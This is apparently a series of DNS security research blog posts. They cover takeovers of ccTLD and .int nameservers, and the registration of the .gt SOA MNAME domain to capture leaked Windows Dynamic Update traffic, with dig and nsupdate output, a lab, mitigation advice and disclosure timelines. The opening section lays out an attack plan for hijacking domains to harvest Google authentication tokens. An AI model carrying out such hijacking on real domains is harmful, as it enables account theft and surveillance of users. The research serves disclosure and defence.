  • Begin returning new nameservers which you control for your target domain with an extremely long TTL (BIND’s resolver supports up to a week by default). This is important so that we can get cached in as many resolvers as possible, we also want to set a low TTL for the actual A record resolution for the sub-domains so that we can switch these over quickly when we want to strike.
  • Once we’ve heavily stacked the deck in our favor we must now get a valid SSL certificate for our domain name. This is one of the trickiest steps because certificate transparency can get us caught very quickly. The discussion around certificate transparency, and getting a certificate without being logged in certificate transparency logs is a long one but suffice to say that it’s not going to be as easy as it was.
  • We now set up multiple servers to host the malicious site with SSL enabled and switch all of the A record responses to point to our malicious servers. We then begin our campaign to get as many Google users as possible to visit the above link to give us their authentication tokens, depending on the goal this may be a more targeted campaign, etc. One nice part about this attack is the victims don’t even have to visit the URL – any tag requests (e.g. anything that causes a GET request) will complete the 302 redirect and yield what we’re looking for.

Widespread Affects – A Tangled Web

One other thing to consider is that not only are all *, *, and *.na domain names vulnerable to DNS hijacking but also anything that depends on these extensions may have become vulnerable as well. For example, other domains that utilize ***.na nameserver hostnames can be poisoned by proxy (though glue records may make this tricky). WHOIS contacts which reflect domains from these extensions are also in danger since WHOIS can be used to pull domains from owners and issue SSL certificates. Moving up the layers of the stack things like HTTP resource includes on websites reveal just how entangled the web actually is.

Conclusions & Final Thoughts

I hope that I’ve made a convincing argument that the security of domain extensions/TLDs is not infallible. Keep in mind that even with all of these DNS tricks the easiest method is likely just to exploit a vulnerability in a service running on a domain extension’s nameservers. In my opinion I believe the following steps should be taken by Internet authorities and the wider community to better secure the DNS:

  • Require phone confirmation for high impact changes to TLDs in addition to the minimum requirement of email confirmation from the WHOIS contacts.
  • Set more strict requirements for TLD nameservers – limiting exposure of ports to just UDP/TCP port 53.
  • Perform continual automated auditing of TLD DNS and notify TLD operators upon detection of DNS errors.
  • Inform domain owners about the risks of buying into various domain extensions/TLDs and keep a record of past security incidents so that people can make an informed decision when purchasing their domains. A high emphasis on things like response times and time to resolve the alleged security incidents are important to track as well.
  • Raise greater awareness of DNSSEC and push DNS resolvers to support it. The adoption for DNSSEC is incredibly poor and if implemented by both the domain and the resolver being used it can thwart some of these hijacking issues (assuming the attacker hasn’t compromised the keys as well). Speaking from personal experience, I don’t even notice DNSSEC failures because virtually no network (mobile, home, etc) that I use actually enforces it. I won’t get into the longer arguments around DNSSEC as a whole but suffice to say it would definitely be an additional layer of protection against these attacks.

Given the political complications when it comes to ccTLDs some of the enforcement of policies is undoubtedly tricky. While I believe that the above list would improve security I also understand that actually ensuring these things happen is also tough especially with so many parties involved (it’s always easier said than done). That being said, it’s important to weigh the safety of the DNS against the appeasement of the parties involved. Given the incredibly large attack surface I’m surprised that compromise of TLDs/domain extensions isn’t a more frequent event.

Responsible Disclosure Timeline

Angola * & * Takeover Disclosure

  • Febuary 14, 2017: Reached out via contact form requesting security contact and PGP key to report vulnerability.
  • Febuary 15, 2017: Reply received with PGP ID specified and PGP encryption requested.
  • Febuary 15, 2017: Sent full details of vulnerability in PGP-encrypted email.
  • Febuary 21, 2017: Emailed Google security team about account takeover issue due to hijacking advising they turn off universal homepage authentication flow for to prevent Google accounts from being hijacked.
  • Febuary 22, 2017: Emailed BackupDNS owner requesting help to block these zones from being added to arbitrary BackupDNS accounts.
  • Febuary 22, 2017: BackupDNS owner replies stating he will put a block in place which requires admin approval to add zones to user accounts.
  • Febuary 22, 2017: Confirmed with BackupDNS owner that I am no longer able to add the zones to my account.
  • Febuary 24, 2017: Received reply stating the problem has been fixed by removing BackupDNS’s nameservers from the list of authoritative nameservers.

Namibia TLD *.na Takeover Disclosure

  • June 3, 2017: Emailed the contacts on the .na WHOIS contact inquiring about the proper place to disclose a security vulnerability in the .na TLD’s WHOIS contact email domains.
  • June 3, 2017: Received confirmation that the admin contact was the appropriate source to disclose this issue.
  • June 3, 2017: Disclosed the issue to the admin contact.
  • June 3, 2017: Vulnerability remediated by changing the nameservers for the domain and removing the RapidSwitch nameservers altogether.

Disclosure Note: This was an incredible turnaround time with the issue being received and fixed in just a few hours. In situations such as these I expect the turnaround to be weeks to months but due to the responsiveness of the operator this was remediated ASAP. Preventing all security issues isn’t possible but reacting quickly to existing ones with haste says a lot, hats off to the DNS admin of the .na TLD!

Guatemala_City_(663)Guatemala City, By Rigostar (Own work) [CC BY-SA 3.0], via Wikimedia Commons.

UPDATE: Guatemala has now patched this issue after I reached out to their DNS administrator (and with a super quick turnaround as well!)

In search of new interesting high-impact DNS vulnerabilities I decided to take a look at the various top-level domains (TLDs) and analyze their configurations for errors. Upon some initial searching it turns out there is a nice open source service which helps DNS administrators scan their domains for misconfigurations called DNSCheck written by The Internet Foundation in Sweden. This tool helps highlight all sorts of odd DNS misconfigurations such as having an authoritative nameserver list mismatch between a domain’s authoritative nameservers and the nameservers set at the parent TLD nameservers (this was the issue causing the domain takeover vulnerabilities in and covered in a previous post). While it doesn’t explicitly point out vulnerabilities in these domains it does let us know if something is misconfigured which is as good a place as any to start.

As of the time of this writing there are ~1,519 top level domains. Instead of scanning each TLD one by one by hand I opted to write a script to automate scanning all the TLDs. The output of the results of this script can be found under my Github repo titled TLD Health Report. The script was designed to highlight which TLDs have the most serious misconfigurations. After spending an hour or two reviewing the TLDs with configuration errors I came across an interesting issue with the .gt TLD. The error can be seen on this Github page and is as follows:

Soa Scan


  • No address found for No IPv4 or IPv6 address was found for the host name.


  • Error while checking SOA MNAME for gt. ( The SOA MNAME is not a valid host name.


  • SOA MNAME for gt. ( not listed as NS. The name server listed as the SOA MNAME is not listed as a name server.

…trimmed for brevity…

As can be seen from the above, multiple errors and warnings state that the domain name is not routable and is an invalid primary master nameserver (MNAME) for the .gt TLD. We can see this configuration in action by doing the following dig command:

[email protected] ~/P/gtmaster> dig SOA

; <<>> DiG 9.8.3-P1 <<>> SOA
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1444
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;        IN    SOA

gt.            0    IN    SOA 2017012900 3600 600 604800 14400

;; Query time: 43 msec
;; WHEN: Sun Jan 29 16:11:57 2017
;; MSG SIZE  rcvd: 101

As can be seen above, we receive an NXDOMAIN error (because the domain we requested does not exist) and along with it we get a statement of authority (SOA) record with listed as the master nameserver. Any requests for a non-existent domains under the .gt TLD will return a SOA record with this domain in it.

“Unresolvable” is Just Another Word for “Not Resolvable Yet

If you’ve read some of the previous posts on DNS vulnerabilities that I’ve written you may have already guessed why this domain isn’t resolving. It’s because it doesn’t exist! As it turns out, it’s also open for registration. With a bit of searching and Google Translate I found that it was available for registration from the “Registro de Dominios .gt.” for around 60$ a year (with a minimum of two years registration).


Would you believe they take Visa?


While pricey, the registration was quick and completely automated which is more than I can say for many other TLDs in Central America. The only drawback was that my debit card was immediately frozen for questionable activity and I had to go online to unfreeze it so that the order could go through:

Apparently buying a Guatemalan domain name at 1:30 AM is grounds for your card being frozen.

Listening for Noise

Due to the SOA MNAME being sort of an esoteric feature of DNS I wasn’t sure what to expect in terms of DNS traffic. It was unclear from casual Googling what types of DNS clients and services would actually make use of this field for anything at all. For this reason I configured my Bind DNS server to answer all A record queries for any domain under .gt with the IP address of my server as a general catch-all. I set up tcpdump to dump all DNS traffic into a pcap file for later analysis and let the box sit overnight.

What I found in the morning was far from expected, when I checked the pcap data I found that computers from all over the country of Guatemala were sending DNS queries to my server:wireshark_trafficWhat in the world is going on? Looking further into the results only appears to yield more confusion:

srv_update_queryA majority of the traffic was in DNS UPDATE queries from internal network IP addresses. The above is an example DNS UPDATE request attempting to update the zone of my DNS server to include an SRV record for an internal LDAP server belonging to a random government network in Guatemala.

So, why all of the DNS queries? If you’re familiar with what _ldap._tcp.dc._msdcs is for then you may have already spotted the forest from the trees.

Understanding Windows Active Directory Domains

To understand why we are getting this traffic we have to take a quick diversion to learn about Windows Active Directory (AD) Domains and DDNS (Dynamic DNS).

Windows domains are structured in much the same way as Internet domain names are structured. When creating a Windows domain you must specify a DNS suffix. This DNS suffix is comparable to a base-domain, with all of the sub-domains being either child domains or simply hostnames of machines under the parent domain. As an example, say we have a Windows domain of and we have a two Windows Active Directory (AD) networks under this parent domain: east and west. In this structure we would set up two domains under the parent domain of as and If we had a dedicated web-server for internal company documentation for the east office under this domain it might have a hostname of In this way we build up a domain-tree of our network, much how is done with the Internet’s DNS. The following is our example network as a tree:

thehackerblog_network_diagramThese hostnames like allow computers and people to easily find each other in this network. The network’s DNS server will take these human-readable hostnames and turn them into IP addresses of the specific machines so that your computer knows where to request the information you’re looking for. So when, for example, you type in the internal website URL of into your web browser, your computer asks the network’s DNS server for the IP address of this hostname in order to find it and route traffic to it.

Given this structure a problem does arise. Since machine IP addresses can often change on these networks, what happens when the server behind suddenly has a change in IP (say due to a new DHCP lease, etc)? How can the network’s DNS servers figure out the new IP address of this machine?

Understanding Windows Dynamic Update

Window’s Active Directory networks solve this problem by the use of something called Dynamic Update. Dynamic update at a core is actually very simple. In order to keep records such as always fresh and accurate, occasionally these servers will reach out the network’s DNS server and update their specific DNS records. For example, if the IP address suddenly changed, this server would reach out to the domain’s DNS server and say “Hey! My IP changed, please update the record to point to my new IP so people know where I am!”. A real world comparable situation would be a person moving apartments and having to notify their friends, workplace, and online shopping outlets of this new location to reach them at via mail.

The process for this a bit technical (I’ve summarized it below) and is as follows (quoted from “Understanding Dynamic Update“):

  • The DNS Client service sends a start of authority (SOA)–type query using the DNS domain name of the computer.
    • The DNS Client service sends a start of authority (SOA)–type query using the DNS domain name of the computer.
  • The client computer uses the currently configured FQDN of the computer (such as as the name that is specified in this query.
    • For standard primary zones, the primary server (owner) that is returned in the SOA query response is fixed and static. It always matches the exact DNS name as it appears in the SOA resource record that is stored with the zone. If, however, the zone being updated is directory integrated, any DNS server that is loading the zone can respond and dynamically insert its own name as the primary server (owner) of the zone in the SOA query response.
  • The DNS Client service then attempts to contact the primary DNS server.
    • The client processes the SOA query response for its name to determine the IP address of the DNS server that is authorized as the primary server for accepting its name. It then proceeds to perform the following sequence of steps as needed to contact and dynamically update its primary server
      • It sends a dynamic update request to the primary server that is determined in the SOA query response.

        If the update succeeds, no further action is taken.

      • If this update fails, the client next sends a name server (NS)–type query for the zone name that is specified in the SOA record.
      • When it receives a response to this query, it sends an SOA query to the first DNS server that is listed in the response.
      • After the SOA query is resolved, the client sends a dynamic update to the server that is specified in the returned SOA record.

        If the update succeeds, no further action is taken.

      • If this update fails, the client repeats the SOA query process by sending to the next DNS server that is listed in the response.
  • After the primary server that can perform the update is contacted, the client sends the update request and the server processes it.

    The contents of the update request include instructions to add host (A) (and possibly pointer (PTR)) resource records for and to remove these same record types for, the name that was registered previously.

    The server also checks to ensure that updates are permitted for the client request. For standard primary zones, dynamic updates are not secured; therefore, any client attempt to update succeeds. For AD DS-integrated zones, updates are secured and performed using directory-based security settings.

The above process is long-winded and can be a lot to consume at first so I’ve bolded the important sections. Summing this up the client does the following:

  • A SOA query with the full hostname of the current machine is sent to the network DNS server by the host. In our previous example this would be a query containing as a hostname.
  • The network’s DNS server receives this request and replies with a SOA record of its own which specifies what the hostname of the master nameserver is. This may be something like, for example.
  • The client then parses this SOA record and then reaches out to specified in the previous server’s SOA MNAME reply with the DNS update/change it would like to make.
  • The DNS server receives this update and changes its records to match accordingly. The DNS record for now points to the host’s new IP address and everything routes properly again!

Windows Domain Naming Conventions & Best Practice Guidelines

The final piece of information we need to absorb before we understand our Guatemalan DNS anomaly is the following requirement for Windows domains:

“By default, the DNS client does not attempt dynamic update of top-level domain (TLD) zones. Any zone that is named with a single-label name is considered to be a TLD zone, for example, com, edu, blank, my-company. To configure a DNS client to allow the dynamic update of TLD zones, you can use the Update Top Level Domain Zones policy setting or you can modify the registry.”

So by default you can’t have a Windows domain of companydomain, for example, because it’s single-label and is considered by Windows to be a top level domain (TLD) like .com, .net, or .gt. While this setting can (hopefully) be disabled on each individual DNS client (read: every computer in your network), it’s much easier just to have a domain of While not all companies follow this direction, it is highly recommended because having a single-label domain could potentially cause many conflictions down the line if your internal network domain ends up being registered as a top-level domain in the Internet’s DNS root zone (an issue known as Name Collision which was, and continues to be, a hotly discussed topic in Internet discussions).

Putting it All Together – Becoming Master of Your Domain!

Now that we have all of this information, the situation becomes quite a bit more clear. The country of Guatemala like has many Windows networks which have internal Windows domains that are sub-domains of the .gt TLD. For example, if Microsoft had an office in Guatemala their internal network domain might be something like _These machines periodically make dynamic DNS updates to their network DNS server to ensure that all of the network’s hostnames are up-to-date and routing properly. For a variety of reasons such as prevention of name collisions with external company Internet sub-domains, it’s also likely that many networks make use of internal network domains which don’t exist on the wider Internet. For example in this case Microsoft may use an internal active directory domain name such as since hosts under this domain wouldn’t ever have naming conflicts with external Internet sub-domains for

The issue is, many subtle DNS misconfigurations can cause DNS requests which should be for the internal domain’s DNS server, to hit the top level domain’s (TLD) servers instead. This issue is known as name collision and is a well-documented issue which is sometimes referred to as DNS queries “leaking”. If a machine uses a DNS resolver which is not aware of the internal network’s DNS setup, or is misconfigured to pass these queries on to the outer-Internet’s DNS servers then these queries are leaked to the .gt TLD servers since they are the delegated nameservers for that entire TLD space. The problem of name collisions is incredibly common and is the same reason why new TLDs are often put up to a large amount of scrutiny to make sure that they aren’t a common internal network domain name such as .local, .localhost, .localdomain, etc.

When this leaking occurs for an internal domain that is part of the .gt extension, the DNS UPDATE query sent by a machine attempting to update an internal DNS record accidentally is sent to the .gt TLD servers. Say, for example, we are a host on the internal domain and we send our DNS UPDATE query to a TLD server. The following is an example of this query performed with the nsupdate DNS command line tool (available on most OS X and Linux systems):

[email protected] ~/P/gtmaster> nsupdate -d
> prereq nxdomain
> update add 800 A
> send
Reply from SOA query:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id:  25175
;; flags: qr rd ra; QUESTION: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
; IN    SOA

;; AUTHORITY SECTION:            0    IN    SOA 2017012812 3600 600 604800 14400

Found zone name:
The master is:
Sending update to
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id:  62645
;; flags:; ZONE: 1, PREREQ: 1, UPDATE: 1, ADDITIONAL: 0


Reply from update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOTAUTH, id:  62645
;; flags: qr; ZONE: 1, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;                IN    SOA


We can see that the query resulted in a NXDOMAIN error but regardless an SOA response is returned with as the master nameserver. Since this is exactly what the host was looking (e.g. it’s a valid SOA response to this query) it parses out MNAME and proceeds to send the DNS update query to the server behind hosted at (my server). This query ends in failure because I’ve set up my DNS server to reject all update requests from clients (since I don’t want to actively interfere with these machines/networks). This is why all of these random machines are sending DNS update requests to my server.

What we have is essentially an new DNS issue which is the result of name collisions leading to dynamic DNS updates being sent to whatever server is listed under a TLD’s SOA record. Unlike regular name collisions though, we don’t need to register an entirely new TLD to exploit this issue we just need to register the domain name listed under an existing TLD’s SOA record (as we did with

Try It Yourself – A Quick Lab

Note: Feel free to skip this section if you’re not interested in replicating these results personally.

If you’d like to see this behavior in action it’s actually fairly simple to replicate. We’ll use Windows 7 as our example OS inside of VMware along with Wireshark running to follow all the DNS traffic being sent by our machine.

To change your computer’s DNS suffix to match what a Guatemalan active directory domain might look like, go to Start > Computer > System Properties > Change Settings > Change > More and set the primary DNS suffix to any domain under the .gt TLD:

change_windows_computer_domain_windwosClick OK and apply this new setting, you will be prompted to restart your computer. Go ahead and do so and keep Wireshark running while Windows is starting up. You should see that during the startup process a few Dynamic Update queries are issued:

example_dns_update_request_chainThe above screenshot of my Wireshark output shows that the Windows VM did the following upon startup:

  • Attempts to query the DNS resolver for the SOA of (Resulting in an NXDOMAIN error because that record doesn’t exist on the public Internet which is configured to query).
  • Windows then parses this NXDOMAIN response and finds a valid SOA MNAME record of in the response sent from the TLD.
  • Windows then reaches out to (my server) and attempts to do a DNS UPDATE request. This fails because my server is configured to refuse all of these requests.
  • Windows then attempts the entire process over again, this time in all capital letters instead (???).

We’ve now seen in-action exactly what goes on with these Windows machines that are hitting the server.

So, Just How Common Is This Issue?

Since Guatemala, and by proxy, the .gt domain space, is relatively small in comparison to the bigger top level domains such as .com, .net, .org, .us, etc we can only see a small fraction of the global number of DNS requests made due to this issue. On the larger scale, it’s likely that a huge amount of traffic is generated to many of the more-popular TLD nameservers from networks which utilize this TLD in their AD domain.

Luckily, while I haven’t been able to find any previous exploit research on Dynamic Update SOA hijacking specifically, we do have a great deal of past-research on name collisions in general. This is largely because of worries about newly issued TLDs conflicting with internal network domains which are utilized by computers/networks across the world. For a good overview of this problem and research into how widespread it is I recommend reading Name Collision in the DNS, a report commission by ICANN to better understand the name collision problem and its effects on the wider Internet. This reports contains lots of real-world data on just how big the name collision problem is and allows us a good base to extrapolate how widespread this specific SOA Dynamic Update variant is in the wild.

Perhaps the most damning piece of real world data that was collected and presented in this report is the following table:

icann_name_collision_tableThe above table is from a ranked list of requested TLDs ordered by number of DNS requests to the roots (in thousands). The list in the report contains the top 100 TLDs in the original report but the above image truncates it to just 20. This table sheds some light on the raw number of leaked DNS requests actually hitting the roots that were never meant to end up there at all. As can be seen, requests for the invalid TLD of .local account for more requests to the DNS roots than all .org and .arpa requests combined – ranking as the 3rd most requested TLD overall! The following pie chart also sheds further light onto the scale of the problem:

icann_tld_breakdown_pie_chartThe above chart shows that a shocking 45% of requests to the root servers are for TLDs which do not exist and are likely the result of leaked DNS requests. Perhaps even more shocking is that the number is likely even higher due to the possibility of internal domains having a valid top level domain but an invalid second level domain, such as the previously mentioned These requests would appear valid to the roots (since .gt is a valid record in the root zone) but would be revealed as leaked/invalid once they hit the TLD servers.

What’s also very interesting is that the report appears to mention that they observed traffic stemming from this problem but did not appear to investigate it much:

5.4.5 Name includes _ldap or _kerberos at the lowest level

Patterns observed show many requests of one of the forms:

  • _ldap._tcp.dc._msdcs.
  • _ldap._tcp.pdc._msdcs.
  • _ldap._tcp..\_sites.dc.\_msdcs.
  • _ldap._tcp..\_sites.gc.\_msdcs.
  • _ldap._tcp.._sites.
  • _ldap._tcp.
  • _kerberos._tcp.dc._msdcs.
  • _kerberos._tcp..\_sites.dc.\_msdcs.
  • _kerberos._tcp.._sites.
  • _kerberos._tcp.

Typically these are queries for SRV records, although sometimes they are requests for SOA

records. They appear to be related to Microsoft Active Directory services.

Look familiar? The above remark about SOA records is almost certainly traffic being generated from this exact same issue. It is mentioned again later in the report as well:

Although the overwhelming majority of the observed DNS traffic in this study has been name lookups (i.e., conventional queries), some other DNS requests have been detected. These are mostly Dynamic Updates—traffic that should never reach the root servers. After all, changes to the DNS root are not carried out using Dynamic Updates, let alone ones originating from random IP addresses on the Internet. The most likely explanation for this behavior would be misconfigured Active Directory installations that leak from an internal network to the public Internet. It should be noted however that this study did not examine the root cause of this traffic.

The statement eventually concludes with:

It is not known what impact, if any, this might have on the end client or how this could change its subsequent behavior. Currently, no significant harm appears to result when these Dynamic Update requests receive a REFUSED or NOTAUTH error response. Returning a referral response after example is delegated at the root might cause these clients to fail or behave unexpectedly. It seems likely that this would create end user confusion and support problems for the organization’s IT department.

Sadly this report doesn’t make any statements about the actual volume of this traffic so we’re unable to get a good idea of the percentage/total scale of this issue in comparison to other name collisions. The report also fails to realize that the security considerations are actually much larger in scope due to the fact that a SOA MNAME returned by TLDs could potentially be a completely arbitrary domain (as was the case with .gt and This allows for potentially any attacker to get in the middle of these DNS transactions via a domain registration just as we exploited for .gt.

Given this admittedly limited information, I don’t think it’s a big reach to assume that this issue is actively occurring at-scale and many of the top level domain servers must see a non-trivial amount of traffic from this problem. Depending on the specific configuration of each TLD’s SOA record they may also be vulnerability to exploitation if their SOA MNAME is available for registration like the case was here.

Fixing the Problem & Wider TLD Security Considerations

Given that the barrier to entry for exploiting this problem is so low (essentially just buying a domain name), and the impact seems to be of concern for a number of reasons, I don’t feel it would be unreasonable to require TLDs to ensure that the SOA MNAME field of their responses be non-resolvable, or resolvable to a TLD-controlled server which refuses to process these dynamic update queries. Given that this mistake appears to be easy to make due to the SOA MNAME field not really being used for DNS-slave replication much anymore, I don’t feel this change should be too unreasonable. Sadly, if you review over the results of the generated TLD Health Report mentioned earlier in this post you’ll see that a shocking number of TLDs are actually very broken in the functional sense. Given this fact, the hope for enforcement of this security concern is low given that even simple things like “having all the TLD nameserver in a working state” are not currently universally true for TLDs. If we can’t even ensure that TLDs are healthy in general how can we ever hope to ensure that all TLDs are mitigating this issue?

Calling on network administrators to prevent issues of this type in their own networks does not appear to be a winnable war either given the scale of DNS name collisions. While it’s important to notify and ensure that network admins understand this risk, ensuring that 100% of networks always configure things properly is a bit of a pipe dream.

A Privacy Nightmare

Given the fact that these machines in Guatemala appear to call out on a pretty regular basis there are some fairly big privacy concerns with this issue. Many of the DNS requests had hostnames which were very personal in nature (think NANCY-PC, MYLAPTOP, etc). Since a DNS UPDATE query is sent due to a variety of triggers this would mean the user’s personal computer would be phoning home to my nameserver every time they travelled, changed networks, or rebooted their machine. This would make it easy to monitor someone as they take their laptop from work, to home, to the local cafe, and so on. The internal IP addresses add to the privacy risk as well, given that it helps map out the remote network’s IP scheme. All the while these people have no idea that their computer was silently reporting their location. Imagine something like the following being built based off of this data:

privacy-concern-exampleNote: The above map doesn’t reflect any real data and is purely for illustrative purposes.

Needless to say, the privacy concerns might raise a few eyebrows.

Ethical Handling of Research Data

Out of respect for the privacy of the people of the Guatemala the raw update query data collected from this research will never be published and has been securely deleted. Additionally, all further traffic from these computers will be routed to to ensure that no further UPDATE queries will be sent for the rest of my domain registration term (of about two years). The IP address is special because it was specifically commissioned by ICANN to warn network administrators of name collision issues. The hope being that if a network admin/tech savvy user in Guatemala sees DNS traffic being routed to this IP they will Google it and immediately find that their network/AD setup is vulnerable to this issue.

Additionally I’ve emailed the DNS admin of the .gt TLD informing her of this issue and asked that she change the MNAME to something no-longer resolvable. Since nobody else can abuse this, combined with the fact that I’m sinkholing all DNS traffic to, combined further with the fact that my domain registration term is two years – I’ve decided to publish this post despite the MNAME still being as of this time_._ I imagine that two years of time for a patch falls within reason for patch expectations :).

Overall this was a fun experiment and highlights some very interesting ramifications of even minor TLD misconfigurations such as this one.

Until next time,


In a past piece of research, we explored the issue of nameserver domains expiring allowing us to take over full control of a target domain. In that example we took over the domain name by buying an expired domain name which was authoritative for the domain. This previous example happened to have two broken nameservers, one being misconfigured and the other being an expired domain name. Due to this combination of issues the domain was totally inaccessible (until I bought the domain and reserved/rehosted the old website again). While this made it easier to take full control of the DNS of the domain (since most clients will automatically fail over to the working nameserver(s)), it also raises an important question. Are there other domains where only some of the nameservers are not working due to them having an expired domain name or some other takeover vulnerability? After all, as discussed in previous posts there are many, different, ways, for a nameserver to become vulnerable to takeover.

A Few Bad Nameservers

In an effort to find a proof-of-concept domain which suffered from having just a few of its nameservers vulnerable to takeover I had to turn back to scanning the Internet. Luckily, since we have an old copy of the .int zone we can start there. After iterating through this list I was able to find yet another vulnerable .int domain: This website is totally functional and working but two of its nameservers are actually expired domain names. Interestingly enough, unless you traverse the DNS tree you likely won’t even notice this issue. For example, here’s the output for an NS query against

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9316
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;            IN    NS

;; ANSWER SECTION:        86399    IN    NS        86399    IN    NS

;; Query time: 173 msec
;; WHEN: Thu Dec  8 14:12:47 2016
;; MSG SIZE  rcvd: 81

As we can see from the above output we’ve asked the resolver (Google’s public resolver) for the nameservers of and it has returned to us and with NOERROR as the status. The domain name is not available and is currently registered, working, and returning DNS records as expected. If this is the case how is this domain vulnerable? It turns out that we are being slightly misled due to the way that dig works. Let’s break down what is happening with dig’s +trace flag:

[email protected] ~> dig +trace

; <<>> DiG 9.8.3-P1 <<>> +trace
;; global options: +cmd
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
;; Received 228 bytes from in 30 ms

int.            172800    IN    NS
int.            172800    IN    NS
int.            172800    IN    NS
int.            172800    IN    NS
int.            172800    IN    NS
;; Received 365 bytes from in 88 ms        86400    IN    NS        86400    IN    NS        86400    IN    NS        86400    IN    NS
;; Received 127 bytes from in 353 ms        86400    IN    A        86400    IN    NS        86400    IN    NS
;; Received 97 bytes from in 172 ms

This shows us dig’s process as it traverses the DNS tree. First we can see it asks the root nameservers for the nameservers of the .int  TLD. This gives us results like, etc. Next dig asks one of the returned .int nameservers at random for the nameservers of our target domain. As we can see from this output there are actually more nameservers which the .int TLD nameservers are recommending to us. However, despite dig receiving these nameservers it hasn’t yet gotten what its looking for. Dig will continue down the delegation chain until it gets an authoritative response. Since the .int TLD nameservers are not authoritative for the zone they don’t set the authoritative answer flag on the DNS response. DNS servers are supposed to set the authoritative answer flag when they are the owner of a specific zone. This is DNS’s way of saying “stop traversing the DNS tree, I’m the owner of the zone you’re looking for – ask me!”. Completing dig’s walk we see that it picks a random nameserver returned by the .int TLD nameservers and asks it what the nameservers are for the domain. Since these nameservers are authoritative for the zone dig takes this answer and returns it to us. Interestingly enough, if dig had encountered some of the non-working nameservers, specifically and it would simply have failed over to one of the working nameservers without letting us know.

Domain Availability, Registry Truth & Sketchy DNS Configurations

Note: This is an aside from the main topic, feel free to skip this section if you don’t want to read about DNS sketchiness.

When I initially scanned for this vulnerability using some custom software I’d written, I received an alert that was available for registration. However when I queried for the domain using dig I found something very odd:

[email protected] ~> dig A 

; <<>> DiG 9.8.3-P1 <<>> A
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18334
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;        IN    A

;; ANSWER SECTION:    299    IN    A

;; Query time: 54 msec
;; WHEN: Sat Dec 17 23:35:00 2016
;; MSG SIZE  rcvd: 51

The above query shows that when we look up the A record (IP address) for we get a valid IP back. So, wait, is actually responding with a valid record? How are we getting back an A record if the domain doesn’t exist? Things get even more weird when you ask what the nameservers are for the domain:

[email protected] ~> dig NS 

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18589
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;        IN    NS

ph.            899    IN    SOA 2016121814 21600 3600 2592000 86400

;; Query time: 60 msec
;; WHEN: Sat Dec 17 23:34:50 2016
;; MSG SIZE  rcvd: 102

According to dig no nameservers are returned for our domain despite us getting an A record back just a moment ago. How can this be? After trying this query I was even less confident the domain was available at all, so I issued the following query to sanity check myself:

[email protected] ~> dig A

; <<>> DiG 9.8.3-P1 <<>> A
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65010
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;    IN    A


;; Query time: 63 msec
;; WHEN: Sat Dec 17 23:39:24 2016
;; MSG SIZE  rcvd: 62

Ok so apparently all domains which don’t exist return an A record. What in the world is at that IP?! The following is a screenshot of what we get when we go to

The above makes it fairly clear what’s happening. Instead of simply failing to resolve, the TLD nameservers return us an A record to a page filled with questionable advertisements as well as a notice that says “This domain is available to be registered”. Likely this is to make a little extra money from people attempting to visit non-existent domains. I’ll refrain from commenting on the ethics or sketchiness of this tactic and stick to how you can detect this with dig. The following query reveals how this is set up:

[email protected] ~> dig ANY '*'

; <<>> DiG 9.8.3-P1 <<>> ANY *
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51271
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;*            IN    ANY

*        299    IN    A

;; Query time: 50 msec
;; WHEN: Sat Dec 17 23:49:15 2016
;; MSG SIZE  rcvd: 42

The above query shows that there is a wildcard A record set up for anything that matched * This is why we saw this behaviour.

For an additional sanity check one powerful tool which is always useful is historical data on domains. One of the largest collectors of historical DNS, WHOIS, and general Internet data that I know of is Domain Tools. After reaching out they were kind enough to provide a researcher account for me so I used there database to get the full story of vulnerabilities such as this one. Querying their dataset we can understand when exactly this domain became vulnerable (expired) in the first place.


Interestingly enough, this historical data shows that this domain has likely been expired since 2013. The fact that this issue could have existed for this long shows that this type of vulnerability is subtle enough to go unnoticed for a long time (~4 years!). Crazy.

Back to the Takeover

Moving back to our takeover, once I realized that was indeed available I was able to register it and become an authoritative nameserver for This is similar to the example but with an interesting caveat. When someone attempts to visit there is about a 50% chance that our nameservers will be queried instead of the authentic ones. The reason for this is due to Round Robin DNS which is a technique used in DNS to distribute load across multiple servers. The concept is fairly simple, in DNS you can return multiple records for a query if you want to distribute the load across a few servers. Since you want to distribute load evenly you will return these records in a random order so that querying clients will choose a different record each time they request it. In the case of a DNS A record this would mean that if you returned three IP addresses in a random order, you should see that each IP address is used by your users roughly 33.33% of the time. We can see this in action if we attempt a few NS queries for directly at the .int TLD nameservers. We get the .int TLD nameservers by doing the following:

[email protected] ~> dig NS int.

; <<>> DiG 9.8.3-P1 <<>> NS int.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54471
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;int.                IN    NS

int.            52121    IN    NS
int.            52121    IN    NS
